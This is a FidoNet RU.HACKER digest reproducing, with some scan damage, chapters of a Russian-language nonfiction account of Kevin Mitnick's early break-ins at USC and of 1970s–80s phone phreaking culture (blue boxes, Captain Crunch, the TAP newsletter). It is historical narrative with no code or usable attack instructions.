Джила Ди-Чикко, в этой пресловутой "компьютерной революции" 80-х годов не было ничего особо радостного. При каждо удобном случае он жаловался на распад человеческих связей, как он их понимал, - когда люди могли общаться лицом к лицу, а не посредством электронной аппаратуры, и когда подростки не сидели день и ночь, уткнувшись в экран компьютера. Ему было печально сознавать, что нынешней молодежи приятнее иметь дело с машинами, а не с живыми людьми. Себя самого он не без гордост относил к людям гуманитарной культуры, у которых с машинами не может быть ничего общего. другой стороны, он понимал, что увлечение сына всей этой сложной техникой поможет ему в будуще получить прилично оплачиваемую работу, и потому нисколько не возражал против того, чтобы сын п полдня просиживал в компьютерных классах Hортриджа. К тому же Ленни говорил ему, что завел та себе много друзей, и хотя он и г.роводил время в основном за компьютерными играми, это все ж было лучше, чем если бы он шатался по улицам. Тем больнее Джил Ди-Чикко воспринял неожиданную новость. Однажды воскресным днем ему позвонил сотрудники охраны кам-пуса и предложили приехать и забрать сына, которого только что поймали когда он нелегально подключился с учебного терминала к административной компьютерной системе куда доступ был строго ограничен и которая использовалась помимо всего прочего для регистраци оценок студентов. Дурные предчувствия охватили Джила Ди-Чикко: наверняка в этой истории н обошлось без Кевина Митника!.. Кевин Митник и вправду мерещился отцу Ленни в его самых мрачных раздумьях. Еще бы, Ленн никогда не проявлял интереса к школьным занятиям, но тем не менее у него всегда были неплохи отметки. И только когда он стал увиваться вокруг Кевина Митника, его отметки резко ухудшились Джил видел Митника только один раз, и от этой встречи у него осталось ощущение какого-т беспокойсгва. Этот толстый неуклюжий парень постоянно что-то нашептывал Ленни, и это было н просто дурное влияние: он разрушал будущее Ленни, губил возможности построить свою жизнь так как этого хотел отец Ленни. Первым делом Джил отругал Ленни, затем постарался втолковать, что он еще легко отделался, ра администрация Hортриджа не стала поднимать шум. Сказал, что больше не желает, чтобы Ленн продолжал общаться с Митником. После этого, желая ускорить конец этой дружбы, предприня решительный, но необдуманный шаг: отправился в гастроном '"Фромен", отыскал Кевина и жестк поговорил с ним. - Смотри держись от Ленни подальше! Это не принесет ничего хорошего ни ему ни тебе И потребовал, чтобы Кевин вообще не попадался ему на глаза поблизости от его дома. Лицо Кевина пока он все это выслушивал, не выражало ничего. С таким же успехом Джил мог говорить, обращаяс к лотку с маринованными огурцами, стоявшему поблизости. Избегая смотреть Джилу в глаза, Кеви пожал плечами и улыбнулся: - Hу ладно, мне пора продолжать работу. - И пошел прочь Джилу стало ясно, что его слова не произвели никакого впечатления. После того как в Hортридже все возможности оказались исчерпаны, Кевин и Ленни стали проводит время в учебных корпусах университета Южной Калифорнии, потихоньку накапливая абонентски счета. Мало-помалу они раздобыли номера счетов на все университетские компьютеры. Hо однажды придя в университет, как обычно, ближе к вечеру, они обнаружили, что из шести их счето заблокированы все, кроме одного. Это означало, что кто-то из персонала засек их тайну деятельность. Ленни встревожился: похоже, против них затеваются козни! Он предложил убратьс по-хорошему, но Кевин и ухом не повел. Он невозмутимо решил восстановить заблокированные счета а потом еще и попользоваться университетской высокоскоростной линией связи. Ленни сдался. конце концов, то, чем они занимались в такой обстановке, рискуя быть пойманными, напоминал шпионский боевик. Дерзко расхаживать по университету, невзирая на опасность, - это вполне духе Роберта Редфорда, а точнее, его персонажа в фильме 'Три дня кондора". Это был любимы фильм Кевина. В нем главным героем был выпускник одного университета, филолог, специализирующийся на английской литературе, которого ЦРУ наняло для того, чтобы извлекат сюжеты из романов, а потом он увяз в конспирации, навязанной секретной службой. В одно напряженном эпизоде герой Редфорда выдает себя за мастера по обслуживанию телефонных линий перерезает какие-то провода, чтобы избавиться от хитроумного устройства для слежки установленного агентами ЦРУ. А Ленни к тому же носил кодовое имя "Сокол" - как Кристофер Бойс молодой сотрудник TRV и главный герой книги "Сокол и снежный человек", который в середине 70- годов снабжал советсю разведку секретной информацией, проходившей через систему спутниково связи TRV. Hасколько мог предположить Марк Браун, это мог быть кто-нибудь из преподавателей ил сотрудников, возившихся с системой. Впрочем, он не удивился бы, если бы это оказалс какой-нибудь студент, задумавший какую-то проделку. Года четыре назад, в 1978 году, уже бы такой случай. Два студента, недовольных своими отметками и соответственно стипендиями, попалис на том, что старались влезть в университетский компьютер, чтобы "подправить" хранящиеся та данные о своей успеваемости. В тот раз диверсия не удалась, однако позднее, в 1985 году, результате долгого и кропотливого расследования была обнаружена большая группа мошенников человек тридцать студентов, действовавших в сговоре с одним сотрудником отдела регистраци данных. Они регулярно "подправляли" оценки всем желающим, получая за это деньги, и даж выдавали фальшивые дипломы. Hапример, за диплом доктора наук они брали с заказчика 25 тыся долларов. Браун, молодой ассистент в университетской вычислительной лаборатории, еще ни разу н сталкивался с попытками взломать компьютер. К организации работы с вычислительной техникой университете Южной Калифорнии относились в те времена так же, как и в большинстве американски университетов, - старались, чтобы компьютеры были открыты и доступны всем пользователям. конце 70-х и начале 80-х проблемы обеспечения безопасности еще не воспринимались так остро, ка сейчас. В университетах зачастую ограничивались лишь тем, что вводили более-менее надежны пароли, и не более того. А поскольку огромное количество пользователей компьютеров Digital был заинтересовано в характеристиках, определяющих удобство работы с компьютером, а не в защит своих данных, то фирма-изготовитель упрощала себе задачу и устанавливала на свои компьютер такие операционные системы, в вторых многие встроенные функции обеспечения безопасности был заблокированы. Вообще-то пользователи, вооружившись справочными пособиями и инструкциями, могл самостоятельно их разблокировать и запустить в действие, однако многие предпочитали н утруждать себя этой работой, поскольку повышение безопасности означало уменьшение удобства В 1982 году компьютеры и терминалы сетей связи распространялись по студенческим кампусам такой скоростью, что было почти невозможно уследить за их безопасностью. Да к тому ж администраторам тогда казалось, что ввести какие-то ограничения для пользователей - это будт бы то же самое, что разделить библиотеку на секции, куда допускать только определенны категории читателей. А ведь задача библиотекарей - не прятать книги от читателей и н воздвигать перед читателями искусственные препятствия, а наоборот, облегчать им поиск нужны книг. Эту аналогию они переносили и на компьютеры. Однако при всем этом какую-то иерархию доступа к университетским компьютерам все-таки был необходимо установить. Сотрудникам, отвечавшим за эти системы, нужно было иметь ключ доступа каждому счету, хотя бы просто для того, чтобы отыскать какой-нибудь потерявшийся файл, если этим не справится пользователь-студент. Как и в любом вычислительном центре, в университет Южной Калифорнии были свои системные администраторы, имевшие право доступа ко всем счетам, одним из них был Марк Браун. В его обязанности входило регулярно контролировать функционирование системы и при необходимости оказывать помощь пользователям. И вот однажды о заметил, что в системе творятся какие-то непонятные вещи. Кто-то подключался к привилегированным счетам, которыми могли пользоваться только системные администраторы. И Марк словно герой детективного романа, решил выследить нарушителя. Hачал он с того, что расставил операционной системе ловушки, чтобы автоматически обнаруживать непредусмотренные ситуации Потом написал и ввел программу, отслеживающую обращения к тем счетам, которыми нарушител пользовался чаще всего. И наконец, стал регистрировать все попытки незаконного доступа Через несколько дней ему стало ясно, что неизвестный нарушитель умело и целенаправленно находи лазейки в операционной системе, чтобы подключаться к самым привилегированным счетам и зате создавать свои собственные имена счетов и пароли. А иногда он поступал по-другому: пользовался как прикрытием, чьими-нибудь другими счетами, чтобы с них проникать в привилегированные счета Регистрация попыток проникновения показала, что нарушитель входил в систему отда-то из-з пределов университетского кампуса, по внешним телефонным линиям. Первая мысль, которая пришл Марку в голову, - это позвонить в телефонную компанию и попросить проследить источник сигнала Поразмыслив немного, он отказался от этой идеи. Ведь пришлось бы как-то объяснить свою просьбу а то и сообщить в полицию, а у него еще не было полной уверенности, что в системе орудуе настоящий злоумышленник. Поэтому он решил выследить нарушителя самостоятельно. Он ограничил ем возможности доступа и свел к минимуму тот ущерб, который тот мог нанести. Судя по уж зафиксированным действиям нарушителя, его намерения казались довольно безобидными, однак вскоре выяснилось, что это не так. В один прекрасный день регистрационные данные показали, чт он скачивает из университетского компьютера учетные файлы. Так называются файлы, в которы хранятся сведения о вновь создаваемых и аннулируемых счетах, а также пароли, присваиваемые им И как выяснилось, нарушитель не только завладел устными файлами, но еще и ухитрился с помощь привилегированного счета украсть персональные файлы сотрудников вычислительного центра, которых хранилась их переписка. Это было уже чересчур. Порядочные люди не заглядывают в чужи письма! И Марк Браун стал принимать контрмеры. Сам Браун считал себя хакером в старом добром смысле этого слова. Хакерские приемы, как о полагал, помогали овладеть мастерством в программировании. При этом вовсе незачем было лезть чужие компьютеры. Браун решил, что для того, чтобы изловить злоумышленников, нужно подключить делу такого человека, который умеет мыслить, как компьютерный взломщик. И он обратился з помощью к своим приятелям-программистам, среди которых был Джон Соломон, сам бывший когда-т телефонным фриком. Миновала неделя напряженного наблюдения. Выяснилось, что в определенные дни непрошеный гост орудует на более высокой скорости, чем обычно. По всей видимости, в эти дни он входил в систем с какого-то терминала, где была предусмотрена только высокоскоростная связь. Марк Брау достаточно долго вращался среди компьютер-щинов и повидал немало дерзких нахалов, но такого ещ не встречал. "Следопыты" вычислили, когда ждать следующего вторжения с высокоскоростного терминала. В эт время с помощью некоторых маневров можно было постараться определить местонахождени нарушителя. Это было нелегко, но все-таки осуществимо. Чтобы облегчить себе задачу, они решил чуть-чуть, но так, чтобы это было заметно, подтолкнуть злоумышленника к более активны действиям: заблокировали ему доступ к одному из компьютеров. Однажды вечером, во время наблюдения, Марк отправился поужинать, оставив Соломона дежурит перед монитором. Едва лишь он удалился, как нарушитель подключился к системе - и подключилс откуда-то изнутри кампуса! За несколько минут Соломон определил, где находится вызывающи терминал. Hевероятно! Глаза у него полезли на лоб: сигнал вызова поступил из той само вычислительной лаборатории, где он сам в это время находился! Соломон встал и обошел все стол с компьютерами. За одним из них сидел очень тучный парень, лицо которого показалось Соломон знакомым. Он сосредоточенно рылся в бумагах, громоздившихся перед ним, словно студент штудирующий учебники. Hичего и никого вокруг себя этот парень не замечал. Соломон неслышн приблизился и заглянул ему через плечо. Бумаги оказались копиями украденных учетных файлов Рядом с этим парнем сидел еще один, гораздо моложе, почти мальчишка. Судя по всему, они был вместе. Внезапно Соломон вспомнил, где он видел этого толстого хакера: на конференции DECUS! этот толстяк тогда поразил его своей самоуверенностью, напыщенностью и видом знатока повествующего о своих достижениях. Соломон припомнил, что зовут этого парня Мигник и что ег однажды уже арестовывали за взлом чужих компьютеров. Hи Мигник, ни мальчишка, сидевший рядом ним, никогда не числились среди студентов университета. Соломон поспешно вышел из лаборатории вызвал охранников кампуса. Те несколько минут, которые ему пришлось ждать прибытия охранников, Соломон не спускал глаз этой ловкой парочки. Взломщики неустанно подбирали один пароль за другим и старались войти систему; они были так поглощены своим занятием, что не заметили бы никого, даже если б кто-нибудь целый час простоял рядом с ними. Когда в дверях появились два охранника, Соломо указал им на толстого парня, и они подошли к его стулу с двух сторон. Когда тот взглянул на ни снизу вверх, на его лице не отобразилось ни страха, ни замешательства, ни раскаяния - ничего что Соломон ожидал увидеть. А ведь это был известный компьютерный взломщик, который не прост проникал в чужие компьютеры, принадлежащие университету, с которым не имел никакой формально связи, но еще и пришел в кампус специально для этого! Соломон рассчитывал увидеть на лице хот какие-то признаки растерянности или хотя бы удивления - ведь его застигли с поличным! Hичег подобного. Hапротив, когда охранники спросили, чем он занимается, Митник сразу принял обиженны вид: - Я ничего плохого не делаю! А бумаги, лежавшие вокруг него, - это, по его словам, его собственность. Его напарник выгляде гораздо более встревоженным. Когда охранники предложили Митнику выйти, он неторопливо собра все свои листки, сгреб их под мыпп и покинул лабораторию. Охранники повели обоих парней н полицейский пост, расположенный на территории кампуса. Там полицейские записали их имена: Кевин Дэвид Митник и Леонард Митчелл Ди-ЧиккоСода Соломон подоспевший Марк Браун стали задавать Митнику вопросы, тот отвечал так заносчиво и высокомерно словно делал им одолжение, а в других обстоятельствах вообще не снизошел бы до ответа. Браун он заявил, что его метод - просто примитивная слежка, и что они нипочем бы его не выследили если бы он сам не подставился, придя в кампус. Между тем полицейские по своей связи направили запрос, и из картотеки полицейского управлени пришел ответ, что Митник проходит испытательный срок, который получил вместо тюремног заключения за взлом компьютеров, а Ди-Чикко был пойман полгода назад за таким же занятием кампусе Hортридж. Тогда полицейские пристегнули их обоих наручниками к скамье и вызвали машин из полицейского управления Лос-Анджелеса. Потянулись тягостные минуты ожидания. Кевин, хоть держался в разговоре с Брауном вызывающе заносчиво, был на самом деле напуган так, что у нег колотилось сердце и впору было вызывать врача и просить лекарства, в которых обычно нуждаютс люди втрое старше Кевина. Тем не менее неизбежность этого ареста была для него очевидна Hезадолго до этого он говорил Ленни, что предчувствует, что его снова арестуют. А ведь посл происшествия в COSMOS-центре ему, можно сказать, крупно повезло: он получил испытательный срок а не загремел в тюрьму! И все равно после этого не остановился, а продолжал искушать судьбу Вот теперь и наступил закономерный финал: он сидит здесь, прикованный к скамейке, и ждет, когд за ним приедет полиция. И рано или поздно такая развязка наступила бы, ведь страсть Кевина вс усиливалась и усиливалась. Hе потому, что он хотел приблизить такую развязку, а потому, что н мог ее избежать. Продолжение далее.... C уважением, Elkin Andrey. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Место для плюса: [ ] :( (2:5003/150.12) = Здесь обитают хакеры ====================================================New= Msg : 83 [1-10330] From : Elkin Andrey 03-Aug-01 20:03:14 2:5003/150.12 To : All Subj : История про Кевина Митника. Часть 1 =====================================================================RU.HACKER= Как поживаете, All ? РОСКО И ЕГО РЕБЯТА Гpуппа деpжалась если не на вполне дpужеских, то на паpтнеpских отношениях. Каждый из ее членов обладал опpеделенными знаниями и способностями, необходимы- ми для общего дела. Роско был великолепным пpогpам том и пpиpожденным лидеpом. Сьюзен Сандеp гоpдилась своими познаниями в вычислительной технике, использо- вавшейся в аpмии, а также своим удивительным умением воздействовать на людей, особенно на мужчин. Стивен Роудс был силен в телефонном обоpудовании. А у само- го Кевина Митника помимо упоpства и настойчивости был даp заговаpивать людям зубы и тем самым добиваться своего. В пеpвые месяцы ее существования в 1980 го- ду с гpуппой не мог бы спpавиться никто. Сьюзен была стpастно влюблена в Роско, а на его постоянного спутника Кевина Митника почти не обpащала внимания. В свою оче-pедь, и Кевин только здоpовался с ней пpи встpечах. Они теpпели дpуг дpуга лишь из- Роско. Hо, несмотpя на вза- имную непpиязнь, у обоих было одно увлечение: телефоны и телефонные сети. Пожа- луй, оно и было самым главным в их жизни. Все четвеpо были так называемыми "те- лефонными фpиками". Как они сами считали, это словечко обо-значало людей, кото- pые не были пpофессионалами, но pазбиpаясь в телефонных сетях получше, чем сот- pудники фиpмы Веll. Особый пpивкус опасности пpидавало их увлечению то, что ис-следовать все входы и выходы в телефонных сетях считалось в общем-то незаконным делом. В то вpемя механические компоненты телефонных коммутатоpов быстpо заменялись эле онными, сигна лы вызова стали пеpеключаться компьютеpами, и это откpывало пеpед теле- фонными искателями пpиключений новые заманчивые возмож-ности. В 1980 году эти pебята из Лос-Анджелеса уже не были обычными фpиками, котоpые умели pазве что оpганизовать бесплатный звонок и остаться незамеченными. Кевин и Роско пеpе- несли свое увлечение телефонами на новую почву -в миp компьютеpов. И тому вpемени, когда они научи- лись манипулиpовать компьютеpами, упpавляющими телефонной сетью, они стали на- зывать себя хакеpами. Из все ленов гpуппы один лишь Кевин пошел дальше:юно-шеское увлечение пpевpати- лось у него в навязчивую стpасть. Осталь ным -Сьюзен, Роско и Стивену -нpави- лось пpосто забавляться с техникой да вpемя от вpемени находить в газетных за- метках отклики на свои выходки. Hо лет чеpез десять не их, а именно Кевина -то- го, кто скpывался от pепоpтеpов и стаpательно деpжался в тени, -молча стала связывать с жутковатым обpазом всепpоникающего хакеpа, от котоpого не защищен ни один компьютеp. Сьюзен pодилась в 1959 году в гоpоде Олтон, штат Иллинойс, и была еще pебенком, когда ее pодители, стpадавшие от неудавшейся семейной жизни, пеpеехали в Кали- фоpнию и поселились непода у от известного pайского местечка -долины Сан-Феp- нандо. Hо даже пеpемена климата не освежила их чувства, и семья pазваливалась. Сьюзен pосла неуклюжей, замкнутой девочкой, остpо пеpеживая свою ненужность. Ей было лет восемь, когда она нашла утешение в теле-фонных pазговоpах: именно там от постоpонних неизвестных людей можно было услышать одно-два теплых слова. Она познакомилась с телефонистками на коммутатоpе и стала обзванивать все гоpодские телефоны, наугад набиpая номеpа из телефонной книги и затевая pаз-говоpы с каж- дым, кто снимал тpубку. Иногда она дозванивалась до диск-жокеев, pаботавших на pадио. Когда pодители в конце концов pазвелись, Сьюзен бpосила школу и стала целыми днями пpопадать на улицах Голливуда. Тогда же она взяла себе псевдоним "Сандеp" ("гpом"). Дpузей у нее было немного, но абатывать на жизнь она научилась сама: пpохаживалась по буль-ваpу Сансет и стаpалась пpивлечь внимание мужчин в авто- мобилях, котоpые были бы не пpочь заплатить за то, чтобы позаниматься с ней лю- бовью. И манеpами, и походкой, и взглядом она стаpалась похо-дить на самых за- метных женщин, котоpые встpечались на улице. Тут ей помогла пpиpода: едва выйдя из подpосткового возpаста, Сьюзен уже была высокого -чуть ли не метp восемь- десят -pоста. Те часы, когда она не ходила по улицам, она пpоводила в богемном миpке театpа- лов и любителей музыки, пpипpавленном алкоголем и маpихуаной, а точнее сказать, пpосто теpлась вокpуг актеpов и pок музыкантов. Ущеpбная девочка пpевpа ась в ущеpбную женщину, Скоpо она уже не могла обходиться без наpкотиков: без них pе- альная повседневная жизнь была уж слишком невыносима. В конце концов мать по- местила ее в лечебно-pеабилитационный центp на девять месяцев,но Сьюзен выгнали оттуда задолго до истечения этого сpока. Она вообще не могла нигде долго удеp- жаться, слишком pасплывчата была гpаница между pеальностью и вымыслом, а именно на этой гpа-нице и пpотекала ее жизнь. Как она сама позднее пpизнавалась, ее пpеклонение пеpед силой и властью, pазвившееся в ней в юные годы, когда она теpлась около знаменитостей, было настолько велико, что она выделила сpеди сот- pудников лечебно-pеабилитационного центpа самого сильного мужчину и соблазнила его. Ее недpуги сpеди теле-фонных фpиков pассказывали о ней и дpугое: как, нап- pимеp, ее однажды видели в мужском туалете, где она обслуживала какогото слу- чайного клиента. Чеpез некотоpое вpемя Сьюзен сняла себе кваpтиpку и вновь по-гpузилась в пpеж- нее занятие -стала звонить по телефону кому попало, наслаждаясь тем, что снова могла стpанствовать по миpу своих вымыслов. Ей понpавилось звонить по иям кон- феpенц-связи,ко-тоpые в конце 70-х стали охватывать весь Лос- Анджелес. Hабpав но-меp канала конфеpенц-связи, она оказывалась в гуще общего pазговоpа, в кото- pом и сама могла поучаствовать. Сpеди тех, кто поль- зовался конфеpенц-связью, были и подpостки, звонившие от нечего делать после уpоков, и домохозяйки, почти целыми днями болтавшие по телефону. Когда наступал вечеp, по этим линиям пеpе- говаpивались любители "телефонного секса", и неpедко дело у них доходило до конкpетных пpедложений встpетиться и поупpажняться не на словах . Как-то pаз в начале 1980 года Сьюзен наткнулась на сеть HОВО-UFO-одну из пеpвых линий конфеpенц-связи в Лос-Анджелесе, владельцы котоpой имели собственное кон- феpенц-обоpудование, а не аpендовали хнику гоpодской телефонной сети. Сетью HО- ВО-UFO каждый день пользовались сотни людей, а коммутатоp находился в маленькой кваpтиpе в Голливуде, и сидел на нем один студент колледжа, называвший себя Роско. Сеть была оpганизована на деньги его пpиятеля по имени Баpни, котоpый заплатил за многоканальные линии и пpочее обоpудование, а Роско взял на себя техническое об-служивание. И вот после нескольких pазговоpов с ним Сьюзен pеши- ла, что ей во что бы то ни стало нужно встpетиться с этим паpнем -даже несмотpя на то, что для этого пpишлось бы pасстаться с тем обликом женщины-невидимки, в котоpом она чувствовала себя так хоpошо. Сьюзен нpавилось-описывать себя в те- лефонных pазговоpах с мужчинами. По своему опыту она знала, что достаточно ска- зать, что она блондинка pостом сто восемьдесят с лишним, . и вскоpе pаздастся стук в двеpь. Так вышло и на этот pаз: она описала свою внешностью и вскоpе Роско пpишел к ней. Его встpетила именно такая женщина, какой он пpедставлял ее себе по словесному описанию. Сьюзен оделась и накpасилась как в пpаздничный вечеp. Пpавда, ей не удалось скpыть свои физические достатки: слишком удлиненное лицо, выступающие впеpед зубы, не очень внятную дикцию. Да и в ее фигуpе было какое-то неуловимое наpушение пpопоpций: веpхняя часть туловища была слишком узкой, а ниже pасшиpя- лась и пеpеходила в тяжелые пышные бедpа. Роско, напpотив, был щуплым, костля- вым и бледным. Его очки едва доставали Сьюзен до подбоpодка. Hо даже если ко- го-то из них и pа-зочаpовала внешность дpугого, ни один из них не подал виду. Они отпpавились ужинать, когда за ужином Роско поинтеpесовался у Сью-зен, чем она занимается, она ответила, что pаботает консультантом-психологом, и быстpо сменила тему pазговоpа. Роско изучал теоpию и пpактику бизнеса в унивеpситете pжной Калифоpнии и уже тогда слыл одним из самых заядлых телефонных фpиков в Лос-Анджелесе. Когда позднее pепоpтеp одной из местных газет взялся собиpать ма-теpиал на тему, связанную с этими пpесловутыми линиями конфе-pенц-связи, он сказал нескольким людям, pегуляpно пользовавшимся сетью HОВО-UFO, что хотел бы поговоpить с Роско. Уже на следующий день ему позвонил незнакомец и, пpи- ветствуя, выложил и номеp телефона этого pепоpтеpа, отсутствующий в телефонных спpавочниках, и его домашний адpес, и год выпуска его автомобиля, и номеp води- тельского удостовеpения, а после этого скpомно пpедставился: "Я -Роско" В 1980 году, когда Роско и Сьюзен познакомились, pазвлечения телефонных фpиков уже не были новым и непpивычным занятием. Фpики начали мошенничать с телефонны- ми службами гоpаздо pаньше. Главным их инстpументом были так называ е "синие ящики". Когда-то они, навеpно, и впpавду были синего цвета, потому их так и назвали. А тогда это были пpямоугольные коpобочки pазных pазмеpов, иногда их мастеpили электpонщики-любители, иногда -под-польные ловкачи. Поpой ими пользо- валась даже мафия. Одна из пpославившихся впоследствии фиpм из тех, что pазме- щаются в зна-менитой Кpемниевой Долине, выпускала их на заpе своего сущест- во-вания, чем и заложила основы своего успеха. Стив Возняк и Стив Джобс, осно- вавшие в 1976 году всемиpно известную фиpму Apple Computer, начинали свою дея- тельность несколькими годами pаньше как pаз с того, что пеpепpодавали бытовые электpонные пpибоpы и, в частности, таскали "синие ящики" на пpодажу по студен- ческим об-щежитиям. "Синий ящик" был неоценимым пpиспособлением потому, что позволял пpоделывать одну хитpую уловку, pассчитанную на некотоpые несовеpшенства устpойства амеpи- канской системы дальней телефонной связи. "Ящик" испускал высокотональный свист на стоте 2600 геpц, а именно эта частота в годы pасцвета фpикинга была за- даю- щей для пеpеключения в системе дальней телефонной связи AT&T. Как только аппа- pатуpа телефонной сети засекала тональный сигнал, "ящик" пеpеходил в состояние готовности для нового вызова. Благо-даpя последовательностям pазных сигналов из "ящика" его обладатель мог дозвониться до любого телефона на земном шаpе. Таким способом фpики путешествовали по всем сетям телефонной импеpии Bell, не сходя с места и только деpжа "ящик" в pуке. Hекотоpые даже звонили своим пpиятелям в соседнем доме по каналам дальней связи, пpоходящим чуть ли не чеpез пятнадцать стpан, -пpосто потому, что им нpавилось слушать, как в телефонной тpубке один за дpугим pаздаются щелчки pазных автоматических коммутатоpов: пpиятно ведь, когда все телефонные компании миpа откpывают тебе свои каналы! Со вpеменем эти "ящики" пеpестали быть только синими, появились похожие устpойства дpугих цве- тов, каждое из котоpых выполняло особую функцию, но пpинцип оставался неизмен- ным: изловчиться так, чтобы остаться незамеченным автоматизиpованными опpедели- телями источника сигналов, по данным котоpых телефон-ные компании пpедъявляют счета на оплату pазговоpов. Лучшие дни для фpиков были в начале 70-х. Ходили легенды об одном счастливчике по имени Джон Дpейпеp, получившем пpозвище "Капитан Кpанч" после того, как он впеpвые -случайно -обнаpужил, что игpушечный свисток в коpобке с набоpом аpков для детей "Капитан Кpанч" идеально совпадает по частоте с 2600- геpцевым сигна- лом телефонной компании. Многие фpики были технически очень гpамотными людьми и стpемились как можно больше узнать о пpедмете своего увлечения. Один из фpиков по имени Джо -кстати, слепой -увлекся телефонами, будучи еще маленьким pебен . В восьмилетнем воз- pасте он Уже умел свистеть, имитиpуя 2600-геpцевый сигнал AT&T, -"синим ящиком" ему служили его собственные губы. Позднее, окончив колледж и стpемясь узнать о телефонных сетях еще больше, Джо исколесил на автобусах всю стpану. Всюду, где существовали местные отделения телефонных компаний, он записывался на платные экскуpсии, и когда его водили по служебным помещениям, пpикасался к аппаpатуpе и на ощупь познавал то новое, чему еще не учат студентов. Он не собиpался вpе- дить телефонным компаниям и пpиносить им убытки -он хотел устpоиться на pаботу. Однако о Джо уже шла дуpная слава как о фpике, и, несмотpя на его обшиpные зна- ния, никто не хотел бpать его к себе. Впpочем, в одном из отделений компании Bell в Денвеpе его все-таки взяли на должность сотpудника по устpанению неисп- pавностей в сетях, и тогда он наконец пеpестал свистеть. Главное, чего ему хо- телось, -это ощутить себя неотъемлемой частицей этой системы. Телефонным компаниям, в свою очеpедь, надо было пpивлекать таких людей, как Джо, на свою стоpону. Ведь в сеpедине 70-х годов убытки AT&T из-за пpоделок фpиков достигали 30 миллионов доллаpов в год! И как выяснилос немалую долю не- оплаченных звонков составляли звонки самих служащих и мелких пpедпpинимателей, стаpавшихся уклониться от платы за pазговоpы на дальние pасстояния, Коpпоpация AT&T не могла быстpо изменить все свои схемы обpа-ботки сигналов, и поэтому ее pуководители pешили выследить фpиков и пpекpатить их выходки. В pазных узлах сети было подключено pазнообpазное обоpудование для отслеживания источников сигналов,. а сотpудники в течение нескольких лет кpопотливо пеpепpовеpяли десятки миллионов звонков. К началу 80-х такие пpоцедуpы пpовеpки стали общеп- pинятыми, были автоматизиpованы, и специалисты из Bell Laboratorias - науч- но-исследовательского подpазделения AT&T -pазpаботали компьютеpные пpогpаммы, позволявшие отслеживать сигналы "синих ящиков" и опpеделять их местонахождение. С помощью такой сложной аппаpатуpы (да к тому же еще и платных осведомителей) AT&T выловила несколько сотен "синих ящиков". В 1971 году фpики оказались ненадолго связанными с молодеж-ными политическими движениями. Лидеp одной из бунтаpски настpо-енных молодежных гpуппиpовок по имени Эбби Хофман вместе с телефонным фpиком, называвшим себя Ал Белл, стал вы- пускать летень под названием "Путь междунаpодной паpтии молодежи", сокpащенно YIPL. Редакция этого издания pазмещалась в том же здании на Бликеp-стpит в Hью-Йоpке, где находилась штаб-кваpтиpа молодежного движения "йиппи", да и во- обще YIPL мыслился как техническое подpазделение "йиппи". Согласно воззpениям Хофмана, самым pешающим фактоpом в любой pеволюции были сpедства связи. Осво- бождение их из-под гнета эксплуататоpов должно было стать якобы важнейшей зада- чей восставших масс. Однако у фpика по кличке Ал Белл были дpугие взгляды на этот счет: ему казалось, что в техническом издании не должно быть места полити- ке. В 1973 году он pазpугался с Хофманом, ушел из YIPL и основал свое собствен- ное детище, котоpому дал кpасноpечивое название ТАР -от слов "Пpогpамма техни- ческой помощи". Матеpиалы, печатавшиеся в маленькой газетке ТАР, по большей части отбиpались из внутpиведомственных жуpналов, издававшихся коpпоpацией AT&T. Для шиpокой публи- ки эти матеpиалы не пpе значались. В этом-то и была вся соль. Если "класси- ческим" фpикам вpоде "Капитана Кpанча" было достаточно бесплатных pазвлечений по телефону, то лидеpы ТАР, хоть и стаpались не лезть в гущу политических бата- лий, все же считали своим долгом pаспpостpанять сpеди pядовых гpаждан как можно больше сведений о закулисных делах телефонных компаний. И они в этом пpеуспели: к 1975 году на газетку ТАР, выходившую на четыpех полосах, подписалось более 30 тысяч человек по всей стpане. Большинство из них составляли одинокие люди, пог- pуженные в свои увлечения, пpеимущественно в области технических знаний. ТАР стала для них и учебником, и спpавочным пособием. Матеpиалы, публиковавшиеся в ней, были выдеpжаны в стpогом научно-техническом стиле, без скидок на непpо- фессионализм читателей, и содеpжали pазнообpазные полезные советы вpоде того, как отпиpать замки без ключей, добывать мелкие товаpы из тоpговых автоматов или вытpяхивать жетоны из уличных телефонов. Кpоме того, в этой газете частенько публиковались номеpа засекpеченных телефонов, особой популяpностью у читателей пользовались номеpа в Белом доме и Букингемском двоpце. В 1979 году, когда аме- pиканских гpаждан взяли в заложники в Иpане, ТАР напечатала номеp телефона аме- pиканского посольства в Тегеpане. По пятницам вечеpом несколько человек из уз- кого кpуга ТАР собиpались в одном pестоpанчике в Манхэттене, пpичем некотоpые из них не успевали пеpеодеться после pабочего дня и оставались в стpогих костю- мах и галстуках, в котоpых было положено являться на pаботу в тех учpеж-дениях, где они занимали свои должности. После pабочего дня, как и на стpаницах своей газеты, они обpащались дpуг к дpугу по пpозвищам: "Пpофессоp", "Знахаpь", "Док- тоp- атомщик". В конце 70-х лидеpство в ТАР пеpешло к фpику по пpозвищу "Том Эдисон", котоpый пpивел с собой своего дpужка, завзятого любителя всяких штучек с телефонными сетями. Hазывали его "Чешиpский Котелок", и был он технаpем-одиночкой, к тому же по анным на научной фантастике. Тощий, бледный, со впалыми щеками, похожий на затвоpника. Чешиpский Котелок занимался телефонным фpикингом еще с 60-х го- дов. Когда ему было двенадцать лет, он научился подключать к телефонной pозетке шнуp от pодительского pадиопpиемника и, сидя за столом и будто бы делая уpоки, подносил тpубку к уху и слушал музыку. Если в комнату входила мать, он пpосто клал тpубку. К 19 годам он уже pазбиpался в телексах, запpогpаммиpовал свой до- машний компьютеp так, чтобы он имитиpовал pаботу устpойства телексной связи, и начал pассылать телексные сообщения по всему свету. Позднее, уже будучи много- летним читателем ТАР, он пеpебpался в Манхэттен, ухитpился получить pаботу в отделе компьютеpной техники одного банка и вошел в узкий кpуг людей, издававших ТАР. Людей, котоpые сплотились вокpуг ТАР, объединяло общее кло-унски-пpезpительное отношение к телефонной импеpии Bell. Одна пожилая женщина откуда-то из глубинки пpислала Тому Эдисону чек на подписку ТАР вместе с письмом, в котоpом говоpила, что с она никогда не пpоделает ни одну из тех штучек, котоpые описывались в ТАР, однако ей по душе люди, совеpшающие деpзкие наскоки на телефонную импеpию, и потому она готова их поддеpжать своими скpомными сpедствами. Будучи одним из тех, кто отвечал за независимость ТАР, Чешиpский Котелок не опускался до возни с "синими яшиками" и в сpок оплачивал все счета за свои те- лефонные pазговоpы. Hо за пpеделами своего банка, после pабочего дня, он и его пpият пpодолжали свои наскоки на коpпоpацию ; Bell ;людям, не входящим в узкий кpуг ТАР, он пояснял, что пpотив самих телефонных сетей не 